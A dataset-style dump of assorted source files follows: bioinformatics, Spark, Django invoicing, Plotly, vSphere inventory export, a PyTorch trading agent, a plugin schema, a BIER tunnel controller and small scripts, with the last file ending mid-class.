index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
996,100 | b3a71432e52c46031eb92b0ce55955d09b59b760 | import argparse
import string
from pyfasta import Fasta
from odetta.gff.feature import Feature
from odetta.gff.tree import build_tree
# Command-line interface: a genome FASTA file and its GFF annotation.
parser = argparse.ArgumentParser(description='TODO')
parser.add_argument('genome', help='TODO')
parser.add_argument('gff')
# Translation table mapping each DNA base to its complement (N maps to itself).
# NOTE: string.maketrans is Python 2 only; this whole script targets Python 2.
complements = string.maketrans('ATCGN', 'TAGCN')


def reverse_complement(seq):
    """Return the reverse complement of a DNA sequence string.

    Complements every base via the `complements` table, then reverses.
    Assumes `seq` contains only the characters A/T/C/G/N (uppercase).
    """
    return seq.translate(complements)[::-1]
def genome_seq(genome, feature):
    """Return the genomic sequence covered by `feature`.

    GFF coordinates are 1-based and end-inclusive, hence the `start - 1`
    in the slice. Sequences on the minus strand are reverse-complemented
    so the result always reads 5' -> 3'.

    :param genome: pyfasta.Fasta mapping seqid -> sequence
    :param feature: GFF feature with seqid/start/end/strand attributes
    """
    seq = genome[feature.seqid][feature.start - 1:feature.end]
    if feature.strand == '-':
        return reverse_complement(seq)
    else:
        return seq
def chunks(l, n):
    """ Yield successive n-sized chunks from l.

    The final chunk may be shorter than n. Works on any sliceable
    sequence (used here to wrap FASTA sequence lines).
    """
    # xrange: Python 2 generator-style range.
    for i in xrange(0, len(l), n):
        yield l[i:i+n]
def fasta_rec(ID, seq):
    """Format one FASTA record: a '>ID' header line followed by the
    sequence wrapped at 70 characters per line."""
    header = '>{}'.format(ID)
    return '\n'.join([header] + list(chunks(seq, 70)))
if __name__ == '__main__':
    args = parser.parse_args()
    genome = Fasta(args.genome)
    chromosomes, genes, transcripts = build_tree(Feature.from_file(args.gff))
    # Emit one spliced (exon-only) FASTA record per transcript.
    for transcript in transcripts.values():
        exons = [x for x in transcript.children if x.type == 'exon']
        # handle an ugly GFF case: a transcript might not have exons explicitly defined,
        # so we're assuming it's implied
        # TODO this would fit better in a "clean GFF" script
        if len(exons) == 0:
            exons = [transcript]
        # Minus-strand exons are concatenated in descending coordinate order
        # so the reverse-complemented pieces stitch together 5' -> 3'.
        reverse = transcript.strand == '-'
        seq = ''
        for exon in sorted(exons, key=lambda e: e.start, reverse=reverse):
            seq += genome_seq(genome, exon)
        # Python 2 print statement.
        print fasta_rec(transcript.ID, seq)
|
996,101 | 6e1acaa13b9cb88015a3ca9ed7e47fa4653f49fa | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 7 16:49:32 2017
@author: hxr
"""
from pyspark import SparkContext
import re
# remove any non-words and split lines into separate words
# finally, convert all words to lowercase
def splitter(line):
    """Split one text line into lowercase words.

    Leading/trailing non-word characters are stripped first, then the line
    is split on runs of non-word characters.

    BUG FIX: for an empty or all-punctuation line, re.split returns [''],
    so the original version fed empty strings into the word count. Empty
    tokens are now filtered out. Returning a list instead of a lazy map
    object is equally valid for Spark's flatMap and easier to test.
    """
    line = re.sub(r'^\W+|\W+$', '', line)
    return [word.lower() for word in re.split(r'\W+', line) if word]
if __name__ == '__main__':
    # Local-mode Spark context for the distinct-word-count job.
    sc = SparkContext("local", "distinct_wordcount")
    # Input file (by its filename, Project Gutenberg #2701: Moby Dick).
    text = sc.textFile('pg2701.txt')
    # Apply splitter to every line and flatten the per-line word lists.
    words = text.flatMap(splitter)
    # for the same word, we only keep one and remove others
    words_distinct = words.distinct()
    # count distinct words
    counts = words_distinct.count()
    print("distinct words:",counts)
|
996,102 | 19b8bc2291df76bf22ac7b25d21bdba1c08aa0a2 | from django.contrib.auth.decorators import login_required,user_passes_test,permission_required
from forms import *
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render_to_response,redirect,get_object_or_404
from django.template import RequestContext
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.forms.models import modelformset_factory,inlineformset_factory
#from django.db.models import Q
from django.http import HttpResponse
from django.http import JsonResponse
from django.db.models import Avg,Sum,Count,F,FloatField,Q
from decimal import *
from comunes import *
#import simplejson
import json
from django.core.serializers.json import DjangoJSONEncoder
from django.utils.safestring import SafeString
@login_required(login_url='/login/')
@user_passes_test(is_in_factura_group, login_url='/login/')
def index_factura(request):
    """List sales invoices (Documento rows with tipo_doc code 'FV').

    A POST with a valid search form filters by invoice number or client
    business name; otherwise all sales invoices are shown. Results are
    annotated with per-invoice line totals and paginated 11 per page.
    """
    form_class = GenericSearchForm
    model = Documento
    template_name = 'index_factura.html'
    # Base queryset: sales invoices only.
    factura_list = model.objects.filter(Q(tipo_doc__codigo='FV'))
    if request.method == 'POST':
        form = form_class(request.POST or None)
        if form.is_valid():
            # Match the search term against the invoice number or the
            # client's business name.
            buscar = form.cleaned_data['buscar']
            factura_list = factura_list.filter(
                Q(correlativo__contains=buscar) |
                Q(cliente__razon_social__contains=buscar))
        # BUG FIX: previously an *invalid* POST form left `factura_list`
        # unbound, raising NameError at the annotate() call below; now an
        # invalid search simply falls back to the unfiltered list.
    else:
        form = GenericSearchForm()
    factura_list = factura_list.annotate(sub_total=Sum(F('documentodet__total')))
    # NOTE(review): 'iva' uses the same expression as sub_total; presumably
    # the tax should be a percentage of the total -- confirm with template.
    factura_list = factura_list.annotate(iva=Sum(F('documentodet__total')))
    paginator = Paginator(factura_list, 11)  # show 11 invoices per page
    page = request.GET.get('page')
    try:
        facturas = paginator.page(page)
    except PageNotAnInteger:
        # Non-numeric page parameter: deliver the first page.
        facturas = paginator.page(1)
    except EmptyPage:
        # Page out of range: deliver the last page.
        facturas = paginator.page(paginator.num_pages)
    return render_to_response(template_name,
        {'form': form, 'facturas': facturas,},
        context_instance=RequestContext(request))
@login_required(login_url='/login/')
@permission_required('ventas.add_documento', login_url='/login/')
def add_factura(request):
    """Create a new sales invoice ('FV') and redirect to its detail page."""
    template_name="factura.html"
    if request.method == 'POST':
        form = ManageFacturas(request.POST,request.FILES)
        if form.is_valid():
            fact_nueva = form.save(commit=False)
            fact_nueva.correlativo=get_new_correlativo('FV')
            fact_nueva.usuario=request.user
            # BUG FIX: the original instantiated an *unsaved*
            # TipoDoc(codigo='FV') and assigned its `id` -- which is always
            # None before save(). Fetch the persisted row and assign the
            # instance to the FK field instead.
            fact_nueva.tipo_doc = get_object_or_404(TipoDoc, codigo='FV')
            fact_nueva.save()
            messages.add_message(request, messages.SUCCESS, ('Operacion exitosa'))
            # If the save was successful, redirect to another page
            return HttpResponseRedirect('/detalle/%s' % fact_nueva.pk)
    else:
        form = ManageFacturas()
    return render_to_response(template_name,
        {'form': form},
        context_instance=RequestContext(request))
@login_required(login_url='/login/')
@permission_required('ventas.add_documento', login_url='/login/')
def detalle(request,pk):
    """Show and extend the line items of invoice `pk`.

    POSTing a valid line form appends a DocumentoDet to the invoice, then
    recomputes the invoice's aggregate fields from its lines (via
    get_data_detalle) and persists them on the Documento row.
    """
    factura = get_object_or_404(Documento, pk=pk)
    #form = ManageDocumentos(instance=documento)
    form_class = GenericSearchForm
    model = DocumentoDet
    if request.method == 'POST':
        form = ManageLineas(request.POST,request.FILES)
        if form.is_valid():
            nueva = form.save(commit=False)
            # Attach the new line to this invoice before saving.
            nueva.documento=factura
            # NOTE(review): Model.save() returns None, so 'a' is unused.
            a=nueva.save()
            data,data_json=get_data_detalle(pk)
            # Update the invoice header with the recomputed line data.
            for dt in data:
                setattr(factura, dt, data[dt])
            factura.save()
            messages.add_message(request, messages.SUCCESS, ('Operacion exitosa'))
            # If the save was successful, redirect to another page
            return HttpResponseRedirect('/detalle/%s' % pk)
    else:
        form = ManageLineas(instance=factura)
    # Current lines plus aggregate data for rendering (data_json feeds JS).
    lineas = model.objects.filter(documento=pk)
    data,data_json=get_data_detalle(pk)
    return render_to_response('detalle.html',
        {'form': form,'id': pk,'factura':factura,'lineas':lineas,'data':data,'data_json':SafeString(data_json)},
        context_instance=RequestContext(request))
@permission_required('ventas.delete_documento', login_url='/login/')
def delete_detalle(request,pk,fact):
    """Delete line `pk` from invoice `fact`, recompute the invoice totals,
    and redirect back to the detail page.

    NOTE(review): unlike the sibling views this one has no @login_required
    decorator -- confirm whether that is intentional.
    """
    # Line to delete.
    linea = get_object_or_404(DocumentoDet, pk=pk)
    factura = get_object_or_404(Documento, pk=fact)
    # Delete the line.
    linea.delete()
    # Re-read the invoice's remaining lines to recalculate its totals.
    data,data_json=get_data_detalle(fact)
    # Update the invoice header with the recalculated line data.
    for dt in data:
        setattr(factura, dt, data[dt])
    factura.save()
    messages.add_message(request, messages.SUCCESS, ('linea eliminada'))
    return HttpResponseRedirect('/detalle/%s' % fact)
@login_required(login_url='/login/')
@permission_required('ventas.change_documento', login_url='/login/')
def edit_factura(request,pk):
    """Edit the header of invoice `pk`; on success redirect to its detail."""
    factura = get_object_or_404(Documento, pk=pk)
    form = ManageFacturas(instance=factura)
    #print form.nombres
    # NOTE(review): truthiness of request.POST (not request.method) -- an
    # empty POST body would be treated as a GET here.
    if request.POST:
        form = ManageFacturas(request.POST,request.FILES,instance=factura)
        if form.is_valid():
            form.save()
            messages.add_message(request, messages.SUCCESS, ('factura editada.'))
            return HttpResponseRedirect('/detalle/%s' % pk)
    return render_to_response('factura.html',
        {'form': form,
        'id': pk},
        context_instance=RequestContext(request))
@login_required(login_url='/login/')
@permission_required('ventas.delete_documento', login_url='/login/')
def delete_factura(request,pk):
    """Delete invoice `pk` after a confirming POST; GET renders the form.

    NOTE(review): the POSTed form is validated but its data is discarded --
    it only acts as a delete confirmation. Confirm that is the intent.
    """
    factura = get_object_or_404(Documento, pk=pk)
    form = ManageFacturas(instance=factura)
    if request.POST:
        form = ManageFacturas(request.POST,request.FILES,instance=factura)
        if form.is_valid():
            factura.delete()
            messages.add_message(request, messages.SUCCESS, ('Factura eliminada'))
            return HttpResponseRedirect('/factura/')
    return render_to_response('factura.html',
        {'form': form,
        'id': pk},
        context_instance=RequestContext(request))
|
996,103 | 4f8d19cf6629c6b33875a0d9a1ded9cb7eb94bca | import plotly.graph_objects as go
# Account components as (Russian label, English label) pairs; only the
# English labels are plotted.
_COMPONENTS = [
    ("Выпуск", "Output (X)"),
    ("Импорт", "Import (IM)"),
    ("Статистическое расхождение", "Statistical discrepancy"),
    ("Экспорт", "Export (EX)"),
    ("Инвестиции", "Investment (I)"),
    ("Конечное потребление", "Final consumption (C)"),
    ("Промежуточное потребление", "Intermediate consumption (AX)"),
]

# Horizontal waterfall: every bar is a relative step from the previous one.
fig = go.Figure(
    go.Waterfall(
        name="2018",
        orientation="h",
        measure=["relative"] * len(_COMPONENTS),
        y=[english for _, english in _COMPONENTS],
        x=[196.6, 21.6, -0.6, -31.9, -23.6, -69.3, -92.7],
        connector={
            "mode": "between",
            "line": {"width": 2, "color": "rgb(0, 0, 0)", "dash": "solid"},
        },
    )
)
# "Национальные счета, РФ, 2018, млрд.руб."
fig.update_layout(title="Goods and services account (Russia, 2018, trn rub)")
fig.write_html("handout/res_use.html", auto_open=True)
fig.show()
|
996,104 | e005a42e0a66c4b1421a009fc0c8f8ac6a1e846d | import atexit
import ssl
import json
import requests
from pyVim import connect
from pyVmomi import vim, vmodl
from argparse import ArgumentParser
import os
from com.vmware.vapi.std_client import DynamicID
from vmware.vapi.vsphere.client import create_vsphere_client
class HostList:
    """Accumulates unique hosts and serializes them in the JSON format
    expected by Prometheus file-based service discovery (file_sd)."""

    def __init__(self, output_filename):
        self.hosts = []
        self.output_filename = output_filename

    def add_host(self, host):
        """Add `host` unless one with the same UUID is already tracked.

        BUG FIX: the original passed host.hostname into host_exists(),
        which compares UUIDs -- so the duplicate check could never match
        and repeated add_host calls produced duplicate entries.
        """
        if not self.host_exists(host.uuid):
            self.hosts.append(host)

    def host_exists(self, uuid):
        """Return True if a host with this UUID is already in the list."""
        for host in self.hosts:
            if host.uuid == uuid:
                return True
        return False

    def prometheus_output(self):
        """Write all hosts as a Prometheus file_sd target list
        ([{"targets": [...], "labels": {...}}, ...])."""
        output = []
        for host in self.hosts:
            x = {
                "targets": [host.hostname],
                "labels" : host.tags
            }
            output.append(x)
        # Redundant with mode 'w' (which truncates), kept to preserve the
        # original delete-then-recreate behavior.
        if os.path.exists(self.output_filename):
            os.remove(self.output_filename)
        with open(self.output_filename, 'w') as f:
            json.dump(output, f)
class Host:
    """One inventory target plus its Prometheus label set."""

    def __init__(self, uuid, hostname, ip_address):
        self.hostname = hostname
        self.ip_address = ip_address
        self.uuid = uuid
        # Seed the label set with the identifying attributes.
        self.tags = {"address": ip_address, "uuid": uuid}

    def add_values(self, key, value):
        """Attach (or overwrite) one label on this host."""
        print(f"Adding value to {self.hostname} key: {key} value: {value}")
        self.tags[key] = value

    def get_hostname(self):
        """Accessor kept for API compatibility; same as self.hostname."""
        return self.hostname
class VMwareInventory:
    """Collects VM inventory (name, IP, UUID, tags) from vCenter/ESXi.

    Uses pyVmomi (SOAP API) to enumerate VirtualMachine objects and, when
    `with_tags` is set, the vSphere Automation SDK (REST) to resolve tag
    and category names. Results accumulate in `self.hostlist`.
    """

    def __init__(self, hostname, username, password, port, output_filename, validate_certs, with_tags):
        self.hostname = hostname
        self.username = username
        self.password = password
        self.port = port
        self.with_tags = with_tags
        self.validate_certs = validate_certs
        self.content = None        # pyVmomi ServiceContent, set by do_login()
        self.rest_content = None   # REST client, set by do_login() when with_tags
        self.hostlist = HostList(output_filename)

    def _login(self):
        """
        Login to vCenter or ESXi server
        Returns: connection object (ServiceContent)
        """
        if self.validate_certs and not hasattr(ssl, 'SSLContext'):
            raise Exception('pyVim does not support changing verification mode with python < 2.7.9. Either update '
                            'python or set validate_certs to false in configuration YAML file.')
        ssl_context = None
        if not self.validate_certs and hasattr(ssl, 'SSLContext'):
            # Certificate validation disabled: accept any server cert.
            ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ssl_context.verify_mode = ssl.CERT_NONE
        service_instance = None
        try:
            service_instance = connect.SmartConnect(host=self.hostname, user=self.username,
                                                    pwd=self.password, sslContext=ssl_context,
                                                    port=self.port)
        except vim.fault.InvalidLogin as e:
            raise Exception("Unable to log on to vCenter or ESXi API at %s:%s as %s: %s" % (
                self.hostname, self.port, self.username, e.msg))
        except vim.fault.NoPermission as e:
            raise Exception("User %s does not have required permission"
                            " to log on to vCenter or ESXi API at %s:%s : %s" % (self.username, self.hostname, self.port, e.msg))
        except (requests.ConnectionError, ssl.SSLError) as e:
            raise Exception("Unable to connect to vCenter or ESXi API at %s on TCP/%s: %s" %
                            (self.hostname, self.port, e))
        except vmodl.fault.InvalidRequest as e:
            # Request is malformed
            raise Exception("Failed to get a response from server %s:%s as "
                            "request is malformed: %s" % (self.hostname, self.port, e.msg))
        except Exception as e:
            raise Exception("Unknown error while connecting to vCenter or ESXi API at %s:%s : %s" % (
                self.hostname, self.port, e))
        if service_instance is None:
            raise Exception("Unknown error while connecting to vCenter or ESXi API at %s:%s" % (
                self.hostname, self.port))
        # Ensure the session is closed when the interpreter exits.
        atexit.register(connect.Disconnect, service_instance)
        return service_instance.RetrieveContent()

    def do_login(self):
        """
        Check requirements and do login
        """
        self.content = self._login()
        if self.with_tags:
            # Tags are only reachable via the REST (vAPI) endpoint.
            self.rest_content = self._login_vapi()

    def _login_vapi(self):
        """
        Login to vCenter API using REST call
        Returns: connection object (vsphere client)
        """
        session = requests.Session()
        session.verify = self.validate_certs
        if not self.validate_certs:
            # Disable warning shown at stdout
            requests.packages.urllib3.disable_warnings()
        print("logging in")
        client = create_vsphere_client(server=self.hostname,
                                       username=self.username,
                                       password=self.password,
                                       session=session)
        if client is None:
            raise Exception("Failed to login to %s using %s" %
                            (self.hostname, self.username))
        return client

    def _get_managed_objects_properties(self, vim_type, properties=None):
        """
        Look up a Managed Object Reference in vCenter / ESXi Environment
        :param vim_type: Type of vim object e.g, for datacenter - vim.Datacenter
        :param properties: List of properties related to vim object e.g. Name
        :return: local content object
        """
        # Get Root Folder
        root_folder = self.content.rootFolder
        if properties is None:
            properties = ['name']
        # Create Container View with default root folder
        mor = self.content.viewManager.CreateContainerView(
            root_folder, [vim_type], True)
        # Create Traversal spec
        traversal_spec = vmodl.query.PropertyCollector.TraversalSpec(
            name="traversal_spec",
            path='view',
            skip=False,
            type=vim.view.ContainerView
        )
        # Create Property Spec
        property_spec = vmodl.query.PropertyCollector.PropertySpec(
            type=vim_type,  # Type of object to retrieved
            all=False,
            pathSet=properties
        )
        # Create Object Spec
        object_spec = vmodl.query.PropertyCollector.ObjectSpec(
            obj=mor,
            skip=True,
            selectSet=[traversal_spec]
        )
        # Create Filter Spec
        filter_spec = vmodl.query.PropertyCollector.FilterSpec(
            objectSet=[object_spec],
            propSet=[property_spec],
            reportMissingObjectsInResults=False
        )
        return self.content.propertyCollector.RetrieveContents([filter_spec])

    def _get_object_prop(self, vm, attributes):
        """Safely get a (possibly nested) property or return None"""
        result = vm
        for attribute in attributes:
            try:
                result = getattr(result, attribute)
            except (AttributeError, IndexError):
                return None
        return result

    def populate(self):
        """Enumerate VMs, resolve their tags, and fill self.hostlist."""
        objects = self._get_managed_objects_properties(vim_type=vim.VirtualMachine,
                                                       properties=['name'])
        # Requires do_login() with with_tags=True (rest_content set).
        tag_svc = self.rest_content.tagging.Tag
        tag_association = self.rest_content.tagging.TagAssociation
        cat_svc = self.rest_content.tagging.Category
        # Get tags and categories to lower amount of api requests needed
        cat_info = dict()
        tags_info = dict()
        tags = tag_svc.list()
        cats = cat_svc.list()
        for cat in cats:
            cat_obj = cat_svc.get(cat)
            cat_info[cat_obj.id] = cat_obj.name
        for tag in tags:
            tag_obj = tag_svc.get(tag)
            tags_info[tag_obj.id] = dict(name=tag_obj.name,category=cat_info[tag_obj.category_id])
        for vm_obj in objects:
            for vm_obj_property in vm_obj.propSet:
                # VMware does not provide a way to uniquely identify VM by its name
                # i.e. there can be two virtual machines with same name
                # Appending "_" and VMware UUID to make it unique
                if not vm_obj.obj.config:
                    # Sometime orphaned VMs return no configurations
                    continue
                if not self.hostlist.host_exists(vm_obj.obj.config.uuid):
                    vm_mo_id = vm_obj.obj._GetMoId()
                    vm_dynamic_id = DynamicID(
                        type='VirtualMachine', id=vm_mo_id)
                    attached_tags = tag_association.list_attached_tags(
                        vm_dynamic_id)
                    # Skip VMs without guest-tools-reported IP addresses.
                    if not vm_obj.obj.guest or not vm_obj.obj.guest.ipAddress:
                        continue
                    host_ip = vm_obj.obj.guest.ipAddress
                    if host_ip is None:
                        continue
                    current_host = Host(
                        vm_obj.obj.config.uuid, vm_obj_property.val, host_ip)
                    # Tag category becomes the label key, tag name the value.
                    for tag_id in attached_tags:
                        current_host.add_values(tags_info[tag_id]['category'], tags_info[tag_id]['name'])
                    self.hostlist.add_host(current_host)
        return
def main():
    """Parse CLI arguments and run the inventory export (optionally forever)."""
    parser = ArgumentParser()
    parser.add_argument("-o", "--hostname", dest="hostname",
                        help="vsphere hostname")
    parser.add_argument("-u", "--username",
                        dest="username",
                        help="vsphere username")
    parser.add_argument("-p", "--password",
                        dest="password",
                        help="vsphere password")
    parser.add_argument("-f", "--file", dest="filename",
                        help="write report to FILE", metavar="FILE")
    parser.add_argument("-l", "--loop", dest="loop",
                        help="loop over and over", action='store_true')
    args = parser.parse_args()
    while True:
        # Port 443, cert validation off, tag collection on (as before).
        vmware = VMwareInventory(args.hostname, args.username, args.password,
                                 "443", args.filename, False, True)
        vmware.do_login()
        vmware.populate()
        vmware.hostlist.prometheus_output()
        # `loop` is a store_true flag; test it idiomatically rather than
        # comparing `== False`.
        if not args.loop:
            break


if __name__ == '__main__':
    main()
996,105 | bd51b057e248b5ee6fd9d4c0b3185e703e341b7a | import torch.nn as nn
import torch.nn.functional as F
import torch
import numpy as np
from enum import IntEnum
class Action(IntEnum):
    """Trading decisions returned by Agent.step().

    Integer values mirror the network's output indices
    (buy=0, sell=1, hold=2) -- see the comment in Agent.step().
    """
    BUY = 0
    SELL = 1
    HOLD = 2
# You need to include any network definitions
# You need to include any network definitions
class TraderNetwork(nn.Module):
    """Three fully connected layers mapping one market row to 3 action scores."""

    def __init__(self, row_size):
        super(TraderNetwork, self).__init__()
        self.size = row_size
        # Widen to 2x the input, narrow back down, then project to 3 actions.
        self.fc1 = nn.Linear(row_size, row_size * 2)
        self.fc2 = nn.Linear(row_size * 2, row_size)
        self.fc3 = nn.Linear(row_size, 3)

    def forward(self, t):
        """Pass the tensor through every layer, each followed by ReLU."""
        for layer in (self.fc1, self.fc2, self.fc3):
            t = F.relu(layer(t))
        return t
class Agent:
    def __init__(self, row_size):
        """Build the trading network, restore its pretrained weights from
        disk, and switch it to inference mode."""
        self.tn = TraderNetwork(row_size).double()
        self.tn.load_state_dict(torch.load("./submission/example_model.pt"))
        self.tn.eval()

    def step(self, row):
        """Decide the action to execute at the open of the next timestep.

        `row` is a numpy array in the training-data format. Returns a
        (Action, fraction) tuple, where the fraction means:
          Action.BUY:  fraction of cash to spend on the purchase
          Action.SELL: fraction of owned shares to sell
          Action.HOLD: ignored
        """
        scores = self.tn(torch.tensor(row)).squeeze(0)
        choice = torch.argmax(scores).item()
        # Output indices are assumed to follow the Action enum:
        # buy=0, sell=1, hold=2.
        decision_table = {
            0: (Action.BUY, 1),
            1: (Action.SELL, 1),
        }
        return decision_table.get(choice, (Action.HOLD, 0))
996,106 | 6cf2fc79e7287ab6aa2ebf9f27c58381ac90f129 | # GENERATED BY KOMAND SDK - DO NOT EDIT
import insightconnect_plugin_runtime
import json
class Component:
    # Human-readable description of this plugin action (generated metadata).
    DESCRIPTION = "Shows when a domain, IP or URL was given attribution of a particular security categorization or threat type (indicators of compromise)"


class Input:
    # Key addressing the action's single input parameter.
    NAME = "name"


class Output:
    # Key addressing the action's single output field.
    TIMELINE = "timeline"
class TimelineInput(insightconnect_plugin_runtime.Input):
    """JSON-schema wrapper describing the action's input: one required
    `name` (a domain name, IP address or URL)."""
    schema = json.loads("""
   {
  "type": "object",
  "title": "Variables",
  "properties": {
    "name": {
      "type": "string",
      "title": "Name",
      "description": "Domain name, IP address or URL",
      "order": 1
    }
  },
  "required": [
    "name"
  ]
}
    """)

    def __init__(self):
        super(self.__class__, self).__init__(self.schema)
class TimelineOutput(insightconnect_plugin_runtime.Output):
    """JSON-schema wrapper describing the action's output: an array of
    timeline entries (attacks, categories, threat types, epoch timestamp)."""
    schema = json.loads("""
   {
  "type": "object",
  "title": "Variables",
  "properties": {
    "timeline": {
      "type": "array",
      "title": "Timeline",
      "description": "Provided data for a queried domain name, IP address or URL",
      "items": {
        "$ref": "#/definitions/timeline"
      },
      "order": 1
    }
  },
  "required": [
    "timeline"
  ],
  "definitions": {
    "timeline": {
      "type": "object",
      "title": "timeline",
      "properties": {
        "attacks": {
          "type": "array",
          "title": "Attacks",
          "description": "Which named attacks, if any, matched the input",
          "items": {
            "type": "string"
          },
          "order": 2
        },
        "categories": {
          "type": "array",
          "title": "Categories",
          "description": "Which Umbrella security category, if any, matched the input",
          "items": {
            "type": "string"
          },
          "order": 1
        },
        "threatTypes": {
          "type": "array",
          "title": "Threat Types",
          "description": "Which threat type, if any, matched in the input",
          "items": {
            "type": "string"
          },
          "order": 3
        },
        "timestamp": {
          "type": "integer",
          "title": "Timestamp",
          "description": "The time when the attribution for this domain or URL changed. This is given in epoch (unix) time stamps",
          "order": 4
        }
      }
    }
  }
}
    """)

    def __init__(self):
        super(self.__class__, self).__init__(self.schema)
|
996,107 | 0c4ed9168ea21210e069b7cc6be4068f57830339 |
import re

# Kerala vehicle registrations: 'KL', a two-digit district code, one or two
# series letters, and a 1-4 digit serial number.
KERALA_PLATE = re.compile(r'KL\d{2}[A-Z]{1,2}\d{1,4}')

# Read candidate numbers, de-duplicating via a set. Fixes in this rewrite:
# files are now closed (with-blocks), the mid-script `from re import *`
# wildcard import is gone, the pattern is compiled once instead of being
# re-parsed on every fullmatch call, and the no-op `else: pass` is dropped.
with open("registrationnumber") as f:
    regnum = {line.rstrip("\n") for line in f}

# Write only the numbers that fully match the Kerala plate pattern.
with open("validregnum", "w") as fout:
    for vehiclenum in regnum:
        if KERALA_PLATE.fullmatch(vehiclenum) is not None:
            fout.write(vehiclenum + "\n")
996,108 | 3d9f522b3ca7de476dcc4c1eb99257a80d433f92 | class Solution:
def longestSubsequence(self, num: List[int], diff: int) -> int:
ans = {}
for i in num:
ans[i] = ans.get(i - diff, 0) + 1
return max(ans.values())
|
996,109 | dd510799959e92cca747645259e1926cd0387ca7 | """
This module implements a TunnelController.
Set encap/decap rules for ipv4/bier
"""
from libs.core.Log import Log
from libs.core.CLI import CLI
from libs.controller.BierController import BierComputation
from libs.GroupManager import GroupManager
from libs.core.Event import Event
from operator import ior
from libs.controller.TopologyController import TopologyController
from libs.TopologyManager import TopologyManager
from libs.Configuration import Configuration
from libs.TableEntryManager import TableEntryManager, TableEntry
from networkx import NodeNotFound
class TunnelController(object):
    """Installs encap/decap table entries for IPv4-over-BIER tunneling,
    reacting to group, topology, and switch-connect events."""

    def __init__(self, base):
        """
        Init TunnelController with the base controller and register
        event handlers.

        :param base: base controller used for table management
        """
        self._baseController = base
        Event.on("group_update", self.update_based_on_group)
        Event.on("topology_change", self.update_based_on_topology)
        # add decap rules for devices
        Event.on("switch_connected", self.add_ipv4_decap_rule)
        self.table_manager = TableEntryManager(controller=base, name="TunnelController")
        self.table_manager.init_table("ingress.tunnel_c.decap_bier")
        self.table_manager.init_table("ingress.tunnel_c.decap_ipv4")
        self.table_manager.init_table("egress.tunnel_c.encap_ipv4")

    ##########################################################
    #                                                        #
    #               BIER encap / decap section               #
    #                                                        #
    ##########################################################

    def update_bier_encap_entry(self, switch=None):
        """
        Install/refresh BIER encap entries on `switch`: one entry per
        multicast address and BIER (sub-)domain, mapping the IPv4
        destination to a precomputed BIER bitstring header.

        :param switch: switch where rules should be installed
        :return:
        """
        valid_entries = []
        for mc_addr in GroupManager.get_mc_addresses():
            for domain in GroupManager.get_domains_for_mc_addr(mc_addr):
                domain = int(domain)
                bitstring = BierComputation.compute_bier_header(mc_addr=mc_addr, domain=domain)
                # 0xBB00: etherType value used for BIER frames here.
                type = 0xBB00
                entry = TableEntry(switch=switch,
                                   match_fields={
                                       "hdr.ipv4.dstAddr": mc_addr,
                                   },
                                   action_name="egress.tunnel_c.add_bier",
                                   action_params={
                                       "bs": bitstring,
                                       "etherType": type,
                                       "domain": domain
                                   })
                if TableEntryManager.handle_table_entry(manager=self.table_manager,
                                                        table_name="egress.tunnel_c.encap_ipv4",
                                                        table_entry=entry):
                    Log.async_debug("Installed encap ipv4 rule for", switch, mc_addr, bitstring)
                valid_entries.append(entry.match_fields)
        # Drop stale entries that no longer correspond to any group/domain.
        self.table_manager.remove_invalid_entries(switch=switch,
                                                  table_name="egress.tunnel_c.encap_ipv4",
                                                  valid_entries=valid_entries)

    def update_bier_decap_rule(self, switch=None):
        """
        Updates the bier decap rules based on the current topology.

        For every domain the switch belongs to, match the switch's own
        BFR bit (ternary match bit/bit) and strip the BIER header.

        :param switch: switch where decap rules should be installed
        :return:
        """
        valid_entries = []
        # bier decap rules
        for domain in TopologyManager.get_domain_for_device(switch):
            domain = int(domain)
            bfr_id = BierComputation.id_to_bitstring(TopologyManager.get_device(switch).get_bfr_id(domain))
            entry = TableEntry(switch=switch,
                               match_fields={
                                   "hdr.bier[0].BitString": (bfr_id, bfr_id),
                                   "hdr.bier[0].Domain": domain
                               },
                               action_name="ingress.tunnel_c.bier_decap",
                               action_params={
                                   "decapBit": bfr_id
                               },
                               priority=1)
            if TableEntryManager.handle_table_entry(manager=self.table_manager,
                                                    table_name="ingress.tunnel_c.decap_bier",
                                                    table_entry=entry):
                Log.async_debug("BIER decap rule updated on", switch, "for domain", domain)
            valid_entries.append(entry.match_fields)
        self.table_manager.remove_invalid_entries(switch=switch,
                                                  table_name="ingress.tunnel_c.decap_bier",
                                                  valid_entries=valid_entries)

    #############################################################
    #                     Event Listener                        #
    #############################################################

    def add_ipv4_decap_rule(self, *args, **kwargs):
        """
        Adds an ipv4 decap rule for the switch (matching the switch's own
        IP as destination). This event is triggered when a switch is
        arbitrated; expects kwargs['name'] = switch name.

        :return:
        """
        device = TopologyManager.get_device(kwargs.get('name'))
        entry = TableEntry(switch=device.get_name(),
                           match_fields={"hdr.ipv4.dstAddr": device.get_ip()},
                           action_name="ingress.tunnel_c.ipv4_decap")
        if TableEntryManager.handle_table_entry(manager=self.table_manager,
                                                table_name="ingress.tunnel_c.decap_ipv4",
                                                table_entry=entry):
            Log.async_debug("Ipv4 decap rule installed for", kwargs.get('name'))

    def update_based_on_topology(self, *args, **kwargs):
        """
        Run an update based on a topology change.
        In this case the bier decap rules have to be adjusted
        because a switch may now be in a different domain.

        :return:
        """
        for bfr in Configuration.get("switches"):
            switch = bfr["name"]
            self.update_bier_decap_rule(switch=switch)

    def update_based_on_group(self, *args, **kwargs):
        """
        Updates tunnel (encap) rules after a multicast group change.

        :return:
        """
        for bfr in Configuration.get("switches"):
            # only update BFIRs (ingress routers encapsulate)
            if not bfr["ingress"]:
                continue
            self.update_bier_encap_entry(switch=bfr["name"])
|
996,110 | 811866bb1a46c055559fe2ff3dec4ec01329d00f | # -*- coding: utf-8 -*-
# Django
from django.views import View
from django.shortcuts import render
# Third Parties
from rest_framework import viewsets
# Project
from entbook.companies.models import Company
from entbook.companies.serializers import CompanySerializer
class CompanyViewSet(viewsets.ModelViewSet):
    """REST CRUD endpoints (list/retrieve/create/update/delete) for Company."""
    queryset = Company.objects.all()
    serializer_class = CompanySerializer
class CompanyListAndCreateView(View):
    """Plain Django view rendering the companies list/create page.

    No context data is passed; presumably the template fetches data from
    the Company REST endpoints client-side -- confirm against the template.
    """
